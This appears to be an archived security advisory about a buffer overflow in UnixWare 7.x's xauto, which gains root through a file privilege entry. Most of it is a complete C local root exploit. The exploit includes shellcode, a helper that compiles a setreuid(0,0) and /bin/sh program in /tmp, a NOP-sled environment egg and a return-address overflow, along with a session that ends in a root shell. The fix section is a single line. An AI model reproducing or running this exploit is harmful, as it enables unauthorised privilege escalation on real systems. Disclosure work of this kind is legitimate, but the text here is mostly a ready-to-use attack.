COMMAND

    xauto

SYSTEMS AFFECTED

    UnixWare 7.x

PROBLEM

    Brock   Tellier    found    following.      Although    UnixWare's
    /usr/X/bin/xauto is NOT suid/sgid, we can still overflow a  buffer
    within it and gain root privileges.  Only tested UnixWare 7.1, all
    other UnixWares should be assumed vulnerable.  xauto is mode  755,
    root/sys and yet we can still use a buffer overflow attack to gain
    root  privileges.   This  is  due  to  (see my UnixWare privileges
    discussion in  my uidadmin  advisory) xauto  gaining the  "setuid"
    privilege in /etc/security/tcb/privs as shown:

        bash-2.02$ cat /etc/security/tcb/privs | grep xauto
        39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto

    The setuid privilege, as you might imagine, allows the program  to
    setuid()  any  way  it  wants.   Therefore  we  must  either  have
    setreuid(0,0); in our shellcode or exec a program that calls  this
    for us.  Exploit:

        bash-2.02$ ls -la /usr/X/bin/xauto
        -rwxr-xr-x    1 root     sys           39968 Apr  3  1998 /usr/X/bin/xauto
        bash-2.02$ cat /etc/security/tcb/privs | grep xauto
        39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto
        bash-2.02$ ./uwxauto
        UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto
        Brock Tellier btellier@usa.net
        Using offset/addr: 9400/0x8047b08
        #

    The code itself:

    /**
     ** UnixWare 7.1 root exploit for xauto
     ** Note that xauto is NOT suid or sgid but gains it's privs from
     ** /etc/security/tcb/privs.  For more info, consult intro(2)
     ** and fileprivs(1)
     **
     **
     ** Brock Tellier btellier@usa.net
     **/


    #include <stdlib.h>
    #include <stdio.h>

    char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */
    "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
    "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
    "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";


    #define EGGLEN 2048
    #define RETLEN 5000
    #define ALIGN 0
    #define NOP 0x90
    #define CODE "void main() { setreuid(0,0); system(\"/bin/sh\"); }\n"

    void buildui() {
      FILE *fp;
      char cc[100];

      fp = fopen("/tmp/ui.c", "w");
      fprintf(fp, CODE);
      fclose(fp);
      snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
      system(cc);

    }

    int main(int argc, char *argv[]) {

      long int offset=0;

      int i;
      int egglen = EGGLEN;
      int retlen;
      long int addr;
      char egg[EGGLEN];
      char ret[RETLEN];
      // who needs __asm__?  Per Solar Designer's suggestion
      unsigned long sp = (unsigned long)&sp;

      buildui();
      if(argc > 3) {
        fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
        exit(0);
      }
      else if (argc == 2){
        offset=atoi(argv[1]);
        retlen=RETLEN;
      }
      else if (argc == 3) {
        offset=atoi(argv[1]);
        retlen=atoi(argv[2]);
      }
      else {
        offset=9400;
        retlen=2000;

      }
      addr=sp + offset;

      fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto\n");
      fprintf(stderr, "Brock Tellier btellier@usa.net\n");
      fprintf(stderr, "Using offset/addr: %d/0x%x\n", offset,addr);

      memset(egg,NOP,egglen);
      memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell));

      for(i=ALIGN;i< retlen-4;i+=4)
        *(int *)&ret[i]=addr;

      memcpy(egg, "EGG=", 4);
      putenv(egg);

      execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL);

    }

SOLUTION

	Fix is out.